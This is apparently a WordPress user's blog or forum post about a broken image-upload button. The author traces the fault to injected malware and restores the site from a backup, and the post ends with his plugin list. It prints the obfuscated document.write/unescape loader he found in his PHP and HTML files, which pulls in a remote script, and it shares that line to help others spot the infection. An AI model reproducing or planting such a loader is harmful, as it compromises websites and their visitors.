Upload/Insert Image Problem & Malicious Plug Ins

I recently had a problem with the Upload/Insert not working. Clicking the button would not bring up the pop up for inserting images. Instead it was bringing me to another page that was similar to the pop up, but useless. In addition my Light box gallery was not working or popping up. I also noticed there are many people complaining about the same issue.

To find the problem, I created a test.php with the code on my “Add New Post” page and through a process of elimination of different codes discovered that I had this suspicious code (script tags are eliminated):

<!–
document.write(unescape(’92o%3CscrdNmipt%20srca9c%3D%2F%2F94Pml%2Ezh9247%2EuSk2FG%2E19Pml5FG%2FjqueryT6%2Ezh9js%3E%3C%2FsFGcripT6t%3E’).replace(/uSk|wf|92o|dNm|Pml|kM|ca9|zh9|FG|T6/g,””));
–>

My test page Upload/Insert Image worked properly after I eliminated this code which was near the header and body tag!

Upon further investigation I found this code in every php script that had a header/body tag. To add insult to injury, I also found the code on .html pages!

I believe this happened because I was testing various plugins. One of the plugins upon activation may have done its nasty deed. Unfortunately I don’t know which plug in it was, because I deleted all the test plugins that I did not like.

In the end I rolled back my site to a prior date and the code and problem went away.

I hope this helps the wordpress community.

Lawrence

ps. Here is a list of my current plugins:

Add to Any: Subscribe Button .9.6.4.1
Ad Rotator 1.0
Akismet 2.2.3
Calendar 2.0
Gallery Plus 1.4.1
intouch 1.1
Lightbox 2 2.8.2
Popup Image Gallery 4.2.3
RS Event 0.6.2
Sideblog WordPress Plugin 5.1
Viper’s Video Quicktags 6.1.20
WordPress Database Backup 2.2.2
WP Super Cache 0.9.3.1